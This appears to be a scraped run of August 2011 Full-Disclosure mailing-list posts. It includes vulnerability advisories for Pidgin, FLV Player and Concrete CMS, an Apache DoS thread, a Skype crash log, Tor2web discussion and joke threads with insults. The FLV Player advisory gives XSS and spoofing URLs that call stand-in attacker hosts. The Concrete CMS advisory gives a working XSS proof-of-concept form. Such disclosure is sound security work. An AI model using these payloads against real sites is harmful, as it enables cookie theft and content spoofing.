Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
May I ask for a month of William and/or Melinda Gates? The wikipedia images appear relatively good even without gimp/PS :) -- joro On Sun, Aug 21, 2011 at 10:34:53PM +0200, Herr E Balls wrote: Hi guys! Welcome to super duper weekend double post of MOHSEP!! I hope you all had good weekend as me! This weekend I have day off so played 36 hours call of duty with no stop. Now my leg like dead. Is ok tho. Here is this weekend's link!: http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html Until tomorrow! Herr E Balls ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insomnia : ISVA-110822.1 - Pidgin IM Insecure URL Handling Remote Code Execution
___ Insomnia Security Vulnerability Advisory: ISVA-110822.1 ___ Name: Pidgin IM Insecure URL Handling Remote Code Execution Reported: 21 July 2011 Vendor Link: http://www.pidgin.im Affected Products: Pidgin Instant Messaging Client = 2.9.0 Original Advisory: http://www.insomniasec.com/advisories/ISVA-110822.1.htm Researcher: James Burton, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ Pidgin is an open source instant messaging client that allows users to log in to accounts on multiple chat networks simultaneously. An insecure URL handling vulnerability exists in Pidgin = 2.9.0 that can be exploited to cause remote code execution. This vulnerability requires user interaction in the form of clicking a malicious crafted URL. ___ Details ___ Pidgin supports the use of URL handlers in IM sessions. The Windows build passes URLs directly to the ShellExecute API where they are executed under the context of the user running the application. When passed through a file:// URL a malicious executable can be hosted and executed off a remote WEBDAV/SMB share. This vulnerability requires user interaction in the form of clicking a crafted URL but Pidgins Insert - Link function gives the option of adding a description which masks the underlying link. This makes the task of social engineering the target a trivial one. This vulnerability has only been confirmed over Google-Talk though exploitation over other chat networks may be possible. ___ Solution ___ Upgrade to Pidgin 2.10.0 from http://www.pidgin.im/ The Pidgin changelog can be found http://developer.pidgin.im/wiki/ChangeLog ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-110822.1 ___ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
Nick FitzGerald made the following keystrokes: Will McAfee wrote: Less funny than yesterday's. Just stop. More predictable than yesterday's. Just stop. My guess is there are 2 things keeping him going. 1. People are looking at the pages. No matter how much people complain the truth is they are looking. He can tell by checking web logs on his site to see if there is interest. He probably see's enough people to feel there are enough seats occupied in his theater to keep the doors opn on the current show. 2. Messages like those above indicate people are still looking/ curious as to how bad the latest renditions are going to be. The critics haven't found a new show yet to generate a better buzz elsehere. They keep coming back to his trainwreck. So, to repeat the phrase to the all of you, Just stop. --Gene ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Killer
Could not get this to work testet on; Ubuntu 10.04.2 LTS 2.6.32-32-server Server version: Apache/2.2.14 (Ubuntu) Vmware guest (2x vcpu's) top showed nearly 100% cpu usage, but server did not run slowly. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
I hope you all had good weekend as me! This weekend I have day off so played 36 hours call of duty with no stop. Now my leg like dead. Is ok tho. What a pity it is only like dead. A really dead leg would fit your pathetic attempts at the english language just perfectly. Now THAT would be worth a ML post and a photoshopped mockery image. Here is this weekend's link!: http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html We do not care. --pb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Killer
22.8.2011 11:42, Kim Henriksen kirjoitti: Could not get this to work testet on; Ubuntu 10.04.2 LTS 2.6.32-32-server Server version: Apache/2.2.14 (Ubuntu) Vmware guest (2x vcpu's) top showed nearly 100% cpu usage, but server did not run slowly. I tested it on Debian Squeeze, and the server and whole WMware client went on knees. Nothing worked but slowly, and Apache restart solved it. -- Q: What is purple and commutes? A: An Abelian grape. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apache Killer
This email was sent via Anonymous email service for free. YOU CAN REMOVE THIS TEXT MESSAGE BY BEING A PAID MEMBER FOR $19/year. Message ID= 114537 http://www.youtube.com/watch?v=fkCQZaVjBhA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
Why not do it yourself? You seem to have lots of time on your hands these days. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Monday, August 22, 2011 12:38 AM To: Herr E Balls Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14! May I ask for a month of William and/or Melinda Gates? The wikipedia images appear relatively good even without gimp/PS :) -- joro On Sun, Aug 21, 2011 at 10:34:53PM +0200, Herr E Balls wrote: Hi guys! Welcome to super duper weekend double post of MOHSEP!! I hope you all had good weekend as me! This weekend I have day off so played 36 hours call of duty with no stop. Now my leg like dead. Is ok tho. Here is this weekend's link!: http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html Until tomorrow! Herr E Balls ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in FLV Player
Hello list! I want to warn you about Content Spoofing and Cross-Site Scripting vulnerabilities in FLV Player. - Affected products: - Vulnerable are different versions of FLV Player (MINI, NORMAL, MAXI and MULTI). Note, that version NORMAL occurs under names player_flv.swf and player_flv_classic.swf. The author of FLV Player didn't fix these vulnerabilities. -- Details: -- Content Spoofing (WASC-12): Flash-files of player FLV Player accept arbitrary addresses in parameter configxml, which allows to spoof content of flash - i.e. by setting address of configuration file from other site. http://site/player_flv.swf?configxml=http://attacker/1.xml http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml http://site/player_flv_multi.swf?configxml=http://attacker/1.xml Flash-files of player FLV Player accept arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of configuration file from other site. http://site/player_flv.swf?config=http://attacker/1.txt http://site/player_flv_maxi.swf?config=http://attacker/1.txt http://site/player_flv_multi.swf?config=http://attacker/1.txt Flash-files of player FLV Player allow to spoof all important parameters, including flv and startimage, and at that accept arbitrary addresses in parameters flv and startimage, which allows to spoof content of flash - i.e. by setting addresses of video and image from other site. And for setting of links at arbitrary site it's possible to use parameters onclick and ondoubleclick. http://site/player_flv.swf?flv=http://attacker/1.flvstartimage=http://attacker/1.jpg http://site/player_flv_maxi.swf?flv=http://attacker/1.flvstartimage=http://attacker/1.jpg http://site/player_flv_multi.swf?flv=http://attacker/1.flvstartimage=http://attacker/1.jpg http://site/player_flv_mini.swf?flv=http://attacker/1.flv XSS (WASC-08): http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie) http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie) http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie) http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie) http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml File xss.xml: ?xml version=1.0 encoding=UTF-8? config param name=onclick value=javascript:alert(document.cookie) / param name=ondoubleclick value=javascript:alert(document.cookie) / /config http://site/player_flv_maxi.swf?config=http://attacker/xss.txt http://site/player_flv_multi.swf?config=http://attacker/xss.txt File xss.txt: onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie) The code will execute after a click (or double click). It's strictly social XSS. Timeline: 2011.02.24 - found these vulnerabilities in different versions of the player and informed owner of the site which used it. 2011.04.21 - announced at my site. 2011.04.22 - informed developer. 2011.08.20 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5098/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Killer
w00t for the youtube video and nice tune too : 2011/8/20 HI-TECH . isowarez.isowarez.isowa...@googlemail.com: Disabling mod_gzip/mod_deflate is a workaround I guess. 2011/8/20 Moritz Naumann secur...@moritz-naumann.com: On 20.08.2011 00:23 HI-TECH . wrote: (see attachment) /Kingcope Works (too) well here. Are there any workarounds other than rate limiting or detecting + dropping the traffic IPS-wise? Moritz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HoG Blog: Don't be so scared, it's only terrorism
http://www.hammerofgod.com/thorblog.aspx#It^s-Only-Terrorism Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 [Description: TMSB-Prod-small] inline: image001.jpg___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Concrete CMS 5.4.1.1 = Cross Site Scripting
Concrete CMS 5.4.1.1 = Cross Site Scripting 1. OVERVIEW Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Concrete5 makes running a website easy. Go to any page in your site, and a editing toolbar gives you all the controls you need to update your website. No intimidating manuals, no complicated administration interfaces - just point and click. 3. VULNERABILITY DESCRIPTION The rcID parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED CMS 5.4.1.1 = 5. PROOF-OF-CONCEPT/EXPLOIT vulnerable parameter: rcID form action=http://[target]/Concrete/index.php/login/do_login/; method=post input type=hidden name=uName value=test / input type=hidden name=uPassword value=test / input type=hidden name=rcID value=' style=display:block;color:red;width:;height:;z-index:;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/)); onmouseover=alert(/XSS/)' / input type=submit name=submit value=Get Concrete CMS 5.4.1.1 XSS / /form 6. SOLUTION Upgrade to 5.4.2 or higher. 7. VENDOR Concrete CMS Developers http://www.concrete5.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-04-14: vulnerability reported 2011-08-04: vendor released fixed version 2011-08-23: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting Project Home: http://www.concrete5.org/ Vendor Release Note: http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/ #yehg [2011-08-23] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
On Mon, 22 Aug 2011 12:09:01 +1200, Nick FitzGerald said: Will McAfee wrote: Less funny than yesterday's. Just stop. More predictable than yesterday's. Just stop. Procmail is your friend. But thanks for following up, I realized I wasn't filtering replies. ;) pgpFMTL3MCABE.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
On Aug 22, 2011, at 6:41 PM, Herr E Balls wrote: Really I dunno what Leg have to do with my english. As long as you're punished for being a public illiterate AND nuisance, leg will fit. Really i think you confuse leg with mouth. Or brain. mexican. Wrong. Dead wrong. Silly xenophobic illiterate. :) --pb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x12
I found the last one actually quite funny. Please continue but photoshop additional people in humorous and improbable situations. On 08/19/2011 09:25 PM, Herr E Balls wrote: Hello fans, whitehats, funky-men and welcome to day 19 of MOHSEP Today I am so tired from reading the full disclosure and chopping french fries all day. You know how is. Anyway here is today's link: http://mohsepblog.blogspot.com/2011/08/friday-august-19th-2011.html Have good weeks ends and dont get sqlmapped by sabu, k? whitehat security need you guys to keep finding alert boxes and shit. Is ok. Until tomorrow! Herr E Balls :D ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
wow! is georgi yet another fbsd kernel sploit guninski! I very honour! Personally I think month of bill gates too similar to month of constipated stefan esser, people gonna find it too hard to tell difference plus also when this month done I gonna check myself into psychiatric rehab for to get over my new addiction to 400% zoom (I currently go around look at life thru magnific glass when not at computer) and 4loko. But thanks for interest! Maybe I think about it for next year. Herr E Balls On Mon, Aug 22, 2011 at 9:38 AM, Georgi Guninski gunin...@guninski.comwrote: May I ask for a month of William and/or Melinda Gates? The wikipedia images appear relatively good even without gimp/PS :) -- joro On Sun, Aug 21, 2011 at 10:34:53PM +0200, Herr E Balls wrote: Hi guys! Welcome to super duper weekend double post of MOHSEP!! I hope you all had good weekend as me! This weekend I have day off so played 36 hours call of duty with no stop. Now my leg like dead. Is ok tho. Here is this weekend's link!: http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html Until tomorrow! Herr E Balls ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
Really I dunno what Leg have to do with my english. Really i think you confuse leg with mouth. Silly mexican. Herr E Balls On Mon, Aug 22, 2011 at 1:05 AM, Pedro B. pedro.borra...@gmail.com wrote: What a pity it is only like dead. A really dead leg would fit your pathetic attempts at the english language just perfectly. Now THAT would be worth a ML post and a photoshopped mockery image. Here is this weekend's link!: http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html We do not care. DIAF. --pb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
hello, http://vulnerability-lab.com/get_content.php?id=180 cheers, noptrix -- Name: Levent 'noptrix' Kayan E-Mail: nopt...@lamergarten.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.noptrix.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor2web 2.0 is live!
Hi all, We are glad to announce the release of the new tor2web software. For those of you who are not aware of what tor2web is let us give you a brief description. The goal of tor2web is that of promoting the use of Tor Hidden Services (https://www.torproject.org/docs/hidden-services.html.en). Hidden Services allow people to run TCP based services without disclosing the identity/location of their server. In the specific they allow people to anonymously publish content to the web. Also, since you are being reached trough the Tor network, you are not required to have a static ip address or purchase a domain. This lowers the entry barrier to content publishing and protect the content publisher from retaliation and Denial of Service attacks. The problem though is that Hidden Services are usually only accessible by installing a Tor client (https://www.torproject.org/projects/torbrowser.html.en). Tor2web creates a transport, by acting as a web proxy, between the internet and the Tor network. This means that anonymous publishers are able to reach a much wider audience. The user visiting a website though tor2web is always advised to install a Tor client as by doing so he will protect his identity and leverage Hidden Services end-to-end encryption. This version of tor2web (called tor2web 2.0) is based on glype PHP web proxy (http://www.glype.com) and it is by no means the definitive solution. We are currently working on a new design that will be able to withstand other attacks that are currently possible. What we have implemented is: * A clear disclaimer warning the user that the content is not being served directly from the server, but it comes from the Tor network * Contact forms for abuse complaints and to report broken websites * Transparent rewriting of URLs into the tor2web form (i.e. so4rmjdiwmqjosxz.onion become so4rmjdiwmqjosxz.tor2web.org) * Blocklists to allow a tor2web node maintainer to block particular websites, the blocklists are stored in md5 format so the node maintainer does not need to store potentially illegal site lists. At this current stage we would like the community to stand-up and help us by: * Finding security and functional bugs in the existing implementation * Volounteering to run new tor2web servers: In this first stage we are looking for reliable systems, run or endorsed by trustworthy organizations involved in anonymity and privacy research and development. For the new release the goals that we wish to further pursue are: * Distribute responsibility across multiple actors * Minimize the probability of takedown of a tor2web node If you want further information on the tor2web project visit: Wiki for new developments: http://wiki.tor2web.org/ Tor2web original website: http://www.tor2web.org Github: https://github.com/globaleaks/tor2web-2.0 Mailing List: tor2web-t...@lists.tor2web.org on http://bit.ly/pxFwNS . IRC: irc.oftc.net #tor2web Have a nice day, Some Random GlobaLeaks Contributors Please spread across the anonimity communities and mailing lists Im involved in anonymity and privacy research and development. I've recently released NiX Web Proxy Script: http://myproxylists.com/proxy-script A fully working online demo: http://myproxylists.com/nix_web_proxy/ PS. Does tor2web require custom modification before you can use a spesific web proxy software with the project? Im still trying to understand what's the point in tor2web :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x12
Obvious sock puppet is obvious. Sent from my iPhone On Aug 22, 2011, at 1:34 PM, root ro...@fibertel.com.ar wrote: I found the last one actually quite funny. Please continue but photoshop additional people in humorous and improbable situations. On 08/19/2011 09:25 PM, Herr E Balls wrote: Hello fans, whitehats, funky-men and welcome to day 19 of MOHSEP Today I am so tired from reading the full disclosure and chopping french fries all day. You know how is. Anyway here is today's link: http://mohsepblog.blogspot.com/2011/08/friday-august-19th-2011.html Have good weeks ends and dont get sqlmapped by sabu, k? whitehat security need you guys to keep finding alert boxes and shit. Is ok. Until tomorrow! Herr E Balls :D ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor2web 2.0 is live!
Im involved in anonymity and privacy research and development. I've recently released NiX Web Proxy Script: http://myproxylists.com/proxy-script A fully working online demo: http://myproxylists.com/nix_web_proxy/ PS. Does tor2web require custom modification before you can use a spesific web proxy software with the project? Im still trying to understand what's the point in tor2web :) Cool! First thing let me clarify what the goal of tor2web is. Tor Hidden Services are usually only accessible through a Tor enabled browser, what tor2web does allow people to visit hidden services from the normal web. It does not claim to guarantee any sort of anonymity on the client side (this can be achieved by using Tor) but only allow people publishing content anonymously with Tor hidden service (https://www.torproject.org/docs/hidden-services.html.en) to be reached from the normal web. I have taken a brief look at your software although I do not like the fact that you are obfuscating your code. For a software that claims security to be their top priority, hiding code is a very bad practice. If you decide to release the source code of your software publicly I will take it into consideration as a possible replacement for the current tor2web code. However I will *never* use software whose code I am unable to read. Thanks for the interest in the tor2web project. - Art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
Thanks valdis, now we know own you with procmail exploit. Is ok. Herr E balls On Mon, Aug 22, 2011 at 5:46 PM, valdis.kletni...@vt.edu wrote: On Mon, 22 Aug 2011 12:09:01 +1200, Nick FitzGerald said: Will McAfee wrote: Less funny than yesterday's. Just stop. More predictable than yesterday's. Just stop. Procmail is your friend. But thanks for following up, I realized I wasn't filtering replies. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!
If you confuse leg with brain no wonder you write such nonsense all the time. If you try think with you leg, what you try type with? You nose? Is silly. An really, I dunno what you saying about xenophobic. Only instrument I play is triangle Herr E Balls On Mon, Aug 22, 2011 at 7:50 PM, Pedro B. pedro.borra...@gmail.com wrote: On Aug 22, 2011, at 6:41 PM, Herr E Balls wrote: Really I dunno what Leg have to do with my english. As long as you're punished for being a public illiterate AND nuisance, leg will fit. Really i think you confuse leg with mouth. Or brain. mexican. Wrong. Dead wrong. Silly xenophobic illiterate. :) --pb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x15
Well guys, the end is near. Now we only have two weeks of MOHSEP left (more or less). I know, I know. Is verys sad. But is ok because u know we be back for special edishons all the time rite? Is ok. Anyways enjoy todays, is something a bit different. Dont worry about send feedback here, we read all your bustercarter email channels on the internet relays blog anyway. Is ok. Here is todays link: http://mohsepblog.blogspot.com/2011/08/monday-august-22nd-2011.html Until tomorrow! Herr E Balls ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
Perhaps you should post the contents of the advisory here as well. Many people won't happily click on a link without any explanations. On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote: hello, http://vulnerability-lab.com/get_content.php?id=180 cheers, noptrix -- Name: Levent 'noptrix' Kayan E-Mail: nopt...@lamergarten.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.noptrix.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
Oh, and BTW... --- Violation Exception Log --- 0:034 g (f10.ed4): Unknown exception (first chance) (f10.ed4): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=c07ca54b ebx=a96959bc ecx=d8f10db2 edx=155f esi=d7263481 edi=3e294540 eip=25c50116 esp=37f91000 ebp=50601616 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 25c50116 cd01int 1 0:000 !exchain 0018e8f8: Skype+8be3a0 (00cbe3a0) This doesn't look like an exploitable buffer overflow to me. I think you just stumbled upon Skype's anti-debug measures. On Tue, Aug 23, 2011 at 1:02 AM, Mario Vilas mvi...@gmail.com wrote: Perhaps you should post the contents of the advisory here as well. Many people won't happily click on a link without any explanations. On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote: hello, http://vulnerability-lab.com/get_content.php?id=180 cheers, noptrix -- Name: Levent 'noptrix' Kayan E-Mail: nopt...@lamergarten.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.noptrix.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor2web 2.0 is live!
Im involved in anonymity and privacy research and development. I've recently released NiX Web Proxy Script: http://myproxylists.com/proxy-script A fully working online demo: http://myproxylists.com/nix_web_proxy/ PS. Does tor2web require custom modification before you can use a spesific web proxy software with the project? Im still trying to understand what's the point in tor2web :) Cool! First thing let me clarify what the goal of tor2web is. Tor Hidden Services are usually only accessible through a Tor enabled browser, what tor2web does allow people to visit hidden services from the normal web. It does not claim to guarantee any sort of anonymity on the client side (this can be achieved by using Tor) but only allow people publishing content anonymously with Tor hidden service (https://www.torproject.org/docs/hidden-services.html.en) to be reached from the normal web. I have taken a brief look at your software although I do not like the fact that you are obfuscating your code. For a software that claims security to be their top priority, hiding code is a very bad practice. I understand your point but it's always harder to find bugs when you have no source code. It's obfuscated because NiX don't have a name yet. If it will become a brand, I'll have no issues to release the source code. The software contains very unique parsing engine and other advanced logics which im not up to publishing to the public unless the above condition has met. There's no backdoors whatsoever and it does not steal any personal information. Protected source code also prevents others from using the software for malicious purposes. We neither will see that easily renamed derivate work. So protected source code has it's advantages/disadvantages. If you decide to release the source code of your software publicly I will take it into consideration as a possible replacement for the current tor2web code. However I will *never* use software whose code I am unable to read. This means you are not using windows nor any other commercial software because they don't release source code? Thanks for the interest in the tor2web project. - Art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor2web 2.0 is live!
Im involved in anonymity and privacy research and development. I've recently released NiX Web Proxy Script: http://myproxylists.com/proxy-script A fully working online demo: http://myproxylists.com/nix_web_proxy/ PS. Does tor2web require custom modification before you can use a spesific web proxy software with the project? Im still trying to understand what's the point in tor2web :) Cool! First thing let me clarify what the goal of tor2web is. Tor Hidden Services are usually only accessible through a Tor enabled browser, what tor2web does allow people to visit hidden services from the normal web. It does not claim to guarantee any sort of anonymity on the client side (this can be achieved by using Tor) but only allow people publishing content anonymously with Tor hidden service (https://www.torproject.org/docs/hidden-services.html.en) to be reached from the normal web. I have taken a brief look at your software although I do not like the fact that you are obfuscating your code. For a software that claims security to be their top priority, hiding code is a very bad practice. I understand your point but it's always harder to find bugs when you have no source code. It's obfuscated because NiX don't have a name yet. If it will become a brand, I'll have no issues to release the source code. The software contains very unique parsing engine and other advanced logics which im not up to publishing to the public unless the above condition has met. There's no backdoors whatsoever and it does not steal any personal information. Protected source code also prevents others from using the software for malicious purposes. We neither will see that easily renamed derivate work. So protected source code has it's advantages/disadvantages. If you decide to release the source code of your software publicly I will take it into consideration as a possible replacement for the current tor2web code. However I will *never* use software whose code I am unable to read. This means you are not using windows nor any other commercial software because they don't release source code? Thanks for the interest in the tor2web project. - Art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/